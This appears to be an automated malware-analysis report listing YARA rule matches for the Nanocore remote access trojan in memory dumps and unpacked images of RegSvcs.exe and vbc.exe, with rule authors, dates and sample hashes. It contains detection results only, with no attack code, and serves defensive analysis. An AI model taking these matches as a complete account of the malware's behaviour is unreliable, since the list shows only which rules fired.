Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.3824d52.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3824d52.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.8a0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.8a0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.3830f84.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3830f84.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.5a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.5a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.5b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.5b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.2280000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2280000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.760000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.760000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.780000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.780000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.5b0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.5b0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.26f171c.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.26f171c.20.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.2280000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2280000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.2250000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2250000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.780000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.780000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.890000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.890000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.4a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.910000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.910000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.8a0000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.8a0000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.26f6574.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.26f6574.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.2254c9f.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2254c9f.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.910000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.910000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.5a0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.5a0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
